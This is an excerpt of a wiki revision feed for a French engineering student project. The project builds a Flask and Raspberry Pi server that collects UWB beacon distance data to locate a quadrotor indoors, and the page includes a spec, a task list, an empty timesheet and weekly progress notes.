===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Calendrier prévisionnel'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Liste des tâches à effectuer&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
# Se documenter sur le projet&lt;br /&gt;
##Langages et technologies utilisées&lt;br /&gt;
##Matériel utilisé&lt;br /&gt;
##Mettre en place du travail sur le Git&lt;br /&gt;
# Réaliser le serveur de collecte&lt;br /&gt;
##Récupérer les trames envoyées par bluetooth par le TAG via la Raspberry Pi&lt;br /&gt;
##Intégrer le serveur de localisation pour interpréter les trames&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
# Réaliser l'interface Web utilisateur&lt;br /&gt;
##Implémenter le serveur de collecte et de localisation&lt;br /&gt;
##Afficher et traiter les données stockées dans les fichiers JSON via le serveur (temps différé + temps réel)&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Feuille d'heures'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Tâche !! Prélude !! Heures S1 !! Heures S2 !! Heures S3 !! Heures S4 !! Heures S5 !! Heures S6 !! Heures S7 !! Heures S8 !! Heures S9 !! Heures S10 !! Heures S11 !! Heures S12 !! Après Noël !! Total&lt;br /&gt;
|-&lt;br /&gt;
| Cahier des charges / Wiki / Gitlab&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur les technos utilisées&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur le matériel&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement du serveur de collecte&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement de l'interface Web&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et intégration du serveur de localisation&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Intégration des différentes parties&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Tests et débuggage&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Optimisation/Correction des programmes&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Avancement du Projet'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Phase préparatoire'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 21/09/17 - Ven 22/09/17]]'' &lt;br /&gt;
*Rendez-vous de mise au point du cahier des charges avec les encadrants/intervenants (M. ZHENG Gang et M. DAGHER Roudy)&lt;br /&gt;
*Elaboration du cahier des charges&lt;br /&gt;
*Elaboration de la page Wiki (préparation de la mise en page et présentation du sujet)&lt;br /&gt;
*Préparation du travail sous forme de Mind Map&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 1'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 28/09/17 - Ven 29/09/17]]'' &lt;br /&gt;
*Revue du Cahier des Charges avec les encadrants&lt;br /&gt;
*Lecture et recherches sur les technologies adaptées&lt;br /&gt;
*Construction de la suite de la Mind Map&lt;br /&gt;
*Création du Gitlab&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 2'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 05/10/17 - Ven 06/10/17]]''  &lt;br /&gt;
*Précisions sur le cahier des charges&lt;br /&gt;
*Listage du matériel&lt;br /&gt;
*Recherche et détermination de solutions technologiques possibles pour les fonctions demandées&lt;br /&gt;
*Début du travail sur le serveur de collecte&lt;br /&gt;
*Apprentissage du langage Python et de l'utilisation du framework Flask&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 3'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Mer 11/10/17 - Jeu 12/10/17]]''  &lt;br /&gt;
*Recherche et développement initial du serveur de collecte de données&lt;br /&gt;
*Complément du Git sur les tâches à effectuer&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons commencé à créer un serveur flask renvoyant pour l'instant une matrice aléatoire. Lors de la requete URL &amp;quot;../matrice&amp;quot;, nous voyons bien une matrice aléatoire apparaitre sur la page WEB. Nous essayons de nous connecter à la Raspberry pi en redirigeant sont port série vers le Bluetooth de façon à récupérer de vrai matrices de distance entre le drone et les balises. Nous pourrons afficher ensuite ces matrices ou alors les stocker dans un fichier en attendant le traitement de celle ci.&lt;br /&gt;
[[Fichier:Requete s3.PNG|300px|serveur flask]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons plusieurs problème avec le Bluetooth pour se connecter avec la Raspberry pi. Quand nous aurons réussi à nous connecter au port série de la Raspberry pi alors nous pour gérer le traitement des données récupérées.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 4'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 19/10/17 - Ven 20/10/17]]''  &lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 5'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 26/10/17 - Ven 27/10/17]]''  &lt;br /&gt;
*&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45699</id>
		<title>P18 Localisation of quadrotors</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45699"/>
				<updated>2017-10-18T09:22:57Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Semaine 3 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Cahier des charges'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Présentation générale du projet&amp;lt;/span&amp;gt;=== &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Contexte&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Dans un monde de plus en plus connecté, de nombreux drones sont déployés pour diverses applications comme l'espionnage, la surveillance, la cartographie de lieux et la livraison de colis. Les technologies nécessaires pour contrôler ces drones sont des sujets de recherche actuels. &lt;br /&gt;
&lt;br /&gt;
Le contrôle de ceux-ci passe tout d'abord par la maîtrise de leur position dans l'espace. Le développement des applications liées à l'utilisation de drones nécessite un travail important sur la localisation spatiale d'objets connectés. &lt;br /&gt;
&lt;br /&gt;
De plus, dans un souci d'utilisation, il est essentiel de développer des interfaces logicielles permettant d'exploiter ces données.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Objectif du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce projet est de développer une interface logicielle permettant de traiter en temps réel les informations de localisation d'un drone et de balises, dans le but de définir leur localisation dans l'espace, en intérieur.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Description du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le contrôle de drones, la première étape importante est de donner ses informations de position. Le but du projet est de développer une interface logicielle permettant de localiser le drone en temps réel en intérieur. Le drone se déplace dans un environnement dans lequel ont été installées de multiples balises. Il est équipé d'une carte, lui permettant de recevoir les distances relatives entre lui-même et les balises, sur laquelle différents algorithmes vont être implémentés pour effectuer la localisation en temps réel. Le projet requiert des compétences en développement hardware (Crazyflie 2.0, voir https://wiki.bitcraze.io/) et software (langage C/C++/Python/Javascript/HTML...).&lt;br /&gt;
&lt;br /&gt;
Il se divise en 4 étapes principales, qui sont:&lt;br /&gt;
*1) Choisir les technologies utilisées&lt;br /&gt;
*2) Choisir l'architecture (OS / APIs)&lt;br /&gt;
*3) Développer les différentes parties du projet&lt;br /&gt;
*4) Intégrer et connecter les différentes parties du projet&lt;br /&gt;
&lt;br /&gt;
La localisation étant en intérieur, le protocole GPS n'est donc pas assez précis pour les applications ciblées. La mise en place d'un tel dispositif permettrait grâce à l'utilisation d'un algorithme d'estimer avec une bonne précision les positions en intérieur d'une balise centrale (appelée Tag) et de balises (appelées Anchor). Le Tag scanne en temps réel la distance relative aux différentes balises, et il nous est retourné la position des balises et du Tag grâce à l'algorithme de localisation.&lt;br /&gt;
&lt;br /&gt;
Le projet se compose de 3 parties:&lt;br /&gt;
* Collect &amp;amp; parse: collecter les données envoyées par les balises en communiquant avec un serveur et récupérer les données adéquates par un tri&lt;br /&gt;
* Localise: déterminer la matrice de position des balises et du Tag en traitant les données récupérées&lt;br /&gt;
* Display: développer l'interface homme machine pour afficher, étudier et utiliser les données traitées&lt;br /&gt;
&lt;br /&gt;
Nous travaillerons dans un premier temps dans une optique temps différé avant de travailler en temps réel. Cela nous permettra d'acquérir des données utiles et réutilisables en aval. &lt;br /&gt;
&lt;br /&gt;
A l'aboutissement du projet, nous devrions être capable via l'interface homme machine développée d'afficher précisément la position spatiale des balises ainsi que du Tag, grâce àl'utilisation d'un algorithme de localisation et des données récupérées, et d'afficher d'autres données relatives au déplacement du Tag ou des balises dans l'espace. &lt;br /&gt;
&lt;br /&gt;
Si le temps le permet, nous pourrons aussi être amenés à adapter et utiliser l'interface développée pour l'utilisation d'un drone.&lt;br /&gt;
&lt;br /&gt;
''Sujet originel''&lt;br /&gt;
&lt;br /&gt;
To achieve the control of quadrotors, the first important task to give its position information. This project is to develop a software(GUI) to localize the quadrotors in real-time. The quadrotor is flying in an environment where several transmitters have been installed. The quadrotor is equipped with a deck to receive the relative distances between the deck and all transmitters, based on which different algorithms will be implemented to realize the real-time localization. The candidates need to have both experiences on hardware (Crazyflie 2.0, see https://wiki.bitcraze.io/) and software development (C/C , Python…). &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Calendrier&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
''[[Avant le 29/09/17]]'' - Élaboration du Cahier des charges, de la liste des tâches et du calendrier prévisionnel&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Octobre]]'' - Serveur de collecte et début du développement de l'interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Décembre]]'' - Interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[A la fin du PFE]]'' - Intégration finale des différentes parties (Serveur de collecte des données &amp;amp; Serveur de localisation &amp;amp; Interface logicielle)&lt;br /&gt;
&lt;br /&gt;
Répartition du volume de travail (***h):&lt;br /&gt;
&lt;br /&gt;
* Recherche sur les technologies à utiliser (**h)&lt;br /&gt;
* Développement du serveur de collecte de données (**h)&lt;br /&gt;
* Réalisation de l'interface logicielle (Web//Logiciel/Application) (**h)&lt;br /&gt;
* Intégration des différentes parties (**h)&lt;br /&gt;
* Test et débuggage (**h)&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix techniques : matériel et logiciel&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Afin de développer ce dispositif, nous allons utiliser une Raspberry Pi 3 associée à une carte réceptrice, qui communique avec 4 balises composées chacune d'un microcontrôleur et d'une carte émettrice radio (UWB5C) et alimentées par batteries. La carte réceptrice joue le rôle du drone à localiser et communiquera les données émises par les balises vers l'ordinateur via Bluetooth.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix technologiques&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Voici les technologies que nous utilisons pour chacune des parties de ce projet.&lt;br /&gt;
&lt;br /&gt;
    1) Serveur de collecte des données:&lt;br /&gt;
       Scanne et parse les données récupérées pour fournir la matrice D des distances relatives du tag aux 4 balises&lt;br /&gt;
        - API&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    2) Serveur de localisation (fourni):&lt;br /&gt;
       Calcule grâce à l'algorithme de localisation et la matrice D les positions spatiales des 4 noeuds et du tag&lt;br /&gt;
        - API&lt;br /&gt;
        - Bootstrap&lt;br /&gt;
        - Jquery&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    3) Interface utilisateur:&lt;br /&gt;
       Affiche courbes, visualisation 3D, boutons ou données des fichiers envoyées par le serveur de localisation&lt;br /&gt;
        - HTML5 / Javascript&lt;br /&gt;
        - Fichiers JSON (serveurs de collecte et de localisation)&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Calendrier prévisionnel'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Liste des tâches à effectuer&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
# Se documenter sur le projet&lt;br /&gt;
##Langages et technologies utilisées&lt;br /&gt;
##Matériel utilisé&lt;br /&gt;
##Mettre en place du travail sur le Git&lt;br /&gt;
# Réaliser le serveur de collecte&lt;br /&gt;
##Récupérer les trames envoyées par bluetooth par le TAG via la Raspberry Pi&lt;br /&gt;
##Intégrer le serveur de localisation pour interpréter les trames&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
# Réaliser l'interface Web utilisateur&lt;br /&gt;
##Implémenter le serveur de collecte et de localisation&lt;br /&gt;
##Afficher et traiter les données stockées dans les fichiers JSON via le serveur (temps différé + temps réel)&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Feuille d'heures'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Tâche !! Prélude !! Heures S1 !! Heures S2 !! Heures S3 !! Heures S4 !! Heures S5 !! Heures S6 !! Heures S7 !! Heures S8 !! Heures S9 !! Heures S10 !! Heures S11 !! Heures S12 !! Après Noël !! Total&lt;br /&gt;
|-&lt;br /&gt;
| Cahier des charges / Wiki / Gitlab&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur les technos utilisées&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur le matériel&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement du serveur de collecte&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement de l'interface Web&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et intégration du serveur de localisation&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Intégration des différentes parties&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Tests et débuggage&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Optimisation/Correction des programmes&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Avancement du Projet'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Phase préparatoire'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 21/09/17 - Ven 22/09/17]]'' &lt;br /&gt;
*Rendez-vous de mise au point du cahier des charges avec les encadrants/intervenants (M. ZHENG Gang et M. DAGHER Roudy)&lt;br /&gt;
*Elaboration du cahier des charges&lt;br /&gt;
*Elaboration de la page Wiki (préparation de la mise en page et présentation du sujet)&lt;br /&gt;
*Préparation du travail sous forme de Mind Map&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 1'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 28/09/17 - Ven 29/09/17]]'' &lt;br /&gt;
*Revue du Cahier des Charges avec les encadrants&lt;br /&gt;
*Lecture et recherches sur les technologies adaptées&lt;br /&gt;
*Construction de la suite de la Mind Map&lt;br /&gt;
*Création du Gitlab&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 2'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 05/10/17 - Ven 06/10/17]]''  &lt;br /&gt;
*Précisions sur le cahier des charges&lt;br /&gt;
*Listage du matériel&lt;br /&gt;
*Recherche et détermination de solutions technologiques possibles pour les fonctions demandées&lt;br /&gt;
*Début du travail sur le serveur de collecte&lt;br /&gt;
*Apprentissage du langage Python et de l'utilisation du framework Flask&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 3'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Mer 11/10/17 - Jeu 12/10/17]]''  &lt;br /&gt;
*Recherche et développement initial du serveur de collecte de données&lt;br /&gt;
*Complément du Git sur les tâches à effectuer&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons commencé à créer un serveur flask renvoyant pour l'instant une matrice aléatoire. Lors de la requete URL &amp;quot;../matrice&amp;quot;, nous voyons bien une matrice aléatoire apparaitre sur la page WEB. Nous essayons de nous connecter à la Raspberry pi en redirigeant sont port série vers le Bluetooth de façon à récupérer de vrai matrices de distance entre le drone et les balises. Nous pourrons afficher ensuite ces matrices ou alors les stocker dans un fichier en attendant le traitement de celle ci.&lt;br /&gt;
[[Fichier:Requete s3.PNG|300px|serveur flask]]&lt;br /&gt;
Nous avons plusieurs problème avec le Bluetooth pour se connecter avec la Raspberry pi. Quand nous aurons réussi à nous connecter au port série de la Raspberry pi alors nous pour gérer le traitement des données récupérées.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 4'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 19/10/17 - Ven 20/10/17]]''  &lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 5'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 26/10/17 - Ven 27/10/17]]''  &lt;br /&gt;
*&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45698</id>
		<title>P18 Localisation of quadrotors</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45698"/>
				<updated>2017-10-18T09:22:33Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Semaine 3 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Cahier des charges'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Présentation générale du projet&amp;lt;/span&amp;gt;=== &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Contexte&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Dans un monde de plus en plus connecté, de nombreux drones sont déployés pour diverses applications comme l'espionnage, la surveillance, la cartographie de lieux et la livraison de colis. Les technologies nécessaires pour contrôler ces drones sont des sujets de recherche actuels. &lt;br /&gt;
&lt;br /&gt;
